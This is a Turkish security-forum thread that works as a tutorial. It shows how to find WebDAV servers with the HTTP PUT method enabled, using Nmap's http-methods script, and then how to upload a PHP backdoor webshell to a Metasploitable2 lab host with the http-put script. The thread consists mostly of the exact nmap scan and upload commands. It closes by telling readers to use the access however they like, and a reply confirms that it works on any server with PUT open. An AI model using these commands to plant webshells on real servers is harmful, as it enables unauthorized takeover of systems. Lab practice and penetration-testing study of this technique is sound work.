İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Nmap Scripts Http Methods (WebDAV-Http-Put) / The Hacker

21-03-2019 14:02
#1
THE HACKER 21 - ait Kullanıcı Resmi (Avatar)
Junior Pentester
Üyelik tarihi:
03/2017
Mesajlar:
2.944
Teşekkür (Etti):
199
Teşekkür (Aldı):
909
Konular:
86
Herkese Merhaba Bu Konuda Nmap Http Method Script'leri İle Hedef Servise Yönelik Pentest İşlemi Gerçekleştireceğiz. Konu İçeriğini Anlatmak Gerekir İse İlk Olarak Hedef Sistemde WEBDAV Protokolünde Put Metodu Açık Olup Olmadığını Öğrenip Ardından Açık İse Bunu Kendi Lehimize Kullanarak Hedef Sistemde Dosya Atma ve Silme vb. İşlemleri Gerçekleştiriyor Olabileceğimizden Shell Upload Ederek Sistemi Kontrol Edeceğiz. Http İstek Metodları Hakkındaki Bilgiyi Şu Konudan Alabilirsiniz ;

https://medium.com/@gokhan.746/http-...s-8f43d4d9c4c6

Benim hedef sistemim "Métasploitable2" olacak.



Nmap Http Methods Scritp'ini kullanarak hedef sistemde kullanmamıza izin verilen metotlara bakalım.


Kod:
nmap --scripts=http-methods -p 80 192.168.1.10


Sadece 4 metot kullanımına izin veriliyor tabiki daha detaylı bakmak gerek bunun için yeni bir script deneyelim tam kullanabileceğimiz metotlara bakabilmek için. Öncelikle yolu göstermek için "Métasploitable2" zafiyetli makinesinin webdav servisindeki "header" bilgisini görmem gerekiyordu.




Öğrendiğimize göre script'i çalıştırmaya ve metot kontrolüne devam edebilirim.




Kod:
nmap -sV --scripts http-methods  --script-args http-methods.url-path="/dav" ,http-methods.test-all 192.168.1.10 -p 80
Desteklenen Metotları Görüyoruz Bu Sayede Sistemde Dosya Ekleme-Silme-Değiştirme-Güncelleme Gibi İşleri Kolaylıkla Yapabiliriz. Şimdi İse "Put" Metodu Açık Olan Sunucuda Dosya Ekleme Silme İşlemini Test Edeceğiz. Yine Bir Nmap Script'i Kullanacağız Artı Olarak Sisteme Webshell Upload Edeceğiz. Zaten sistemde mevcut olan "php-bacdoor.php" kullanacağım ben




Kod:
cd /usr/share/webshells/php
ls
Shell yolunu öğrendiğinize göre upload işlemini gerçekleştirebiliriz. İlk defa duyulacak belki ama Parrot Os hata verdiğinden Kali'de devam edeceğim işleme.




Kod:
nmap -p 80 192.168.1.10 --script http-put --script-args  http-put.url='/dav/tht.php',http-put.file='/usr/share/webshells/php/php-backdoor.php'
Yazarak sisteme shell'imizi upload ediyoruz, tht.php yazan yere istediğiniz ismi verebilirsiniz "blabla.php" olacak şekilde.









Gerekli Yetkileri Almış Olduk Geri Kalan İşlem Size Kaldı Nasıl Kullanmak İsterseniz Kullanabilirsiniz.




Konu THE HACKER 21 tarafından (22-03-2019 17:13 Saat 17:13 ) değiştirilmiştir.
"Tranquila, p0inne Teşekkür etti.

21-03-2019 17:24
#2
"Tranquila - ait Kullanıcı Resmi (Avatar)
Stajyer Sosyal Medya Yöneticisi
Üyelik tarihi:
08/2017
Nereden:
Trabzon
Yaş:
1
Mesajlar:
1.997
Konular:
239
Hangi açıkları bu yönde kullanabiliriz
Kullanıcı İmzası
Eski bilgi teknolojileri ekibi albayı
Dışına baksam kat kat cila
İçeriyi kemiren tahtakuruları

Konu Tegin tarafından (21-03-2019 17:34 Saat 17:34 ) değiştirilmiştir.
21-03-2019 17:25
#3
THE HACKER 21 - ait Kullanıcı Resmi (Avatar)
Junior Pentester
Üyelik tarihi:
03/2017
Mesajlar:
2.944
Teşekkür (Etti):
199
Teşekkür (Aldı):
909
Konular:
86
Alıntı:
"Tranquila´isimli üyeden Alıntı Mesajı göster
Hangi Açıkları Bu Yönde Kullanabiliriz
Konuda da Belirttiğim Gibi Put Metodu Açık İse Kullanabilirsin.
Konu THE HACKER 21 tarafından (21-03-2019 17:53 Saat 17:53 ) değiştirilmiştir.
"Tranquila Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı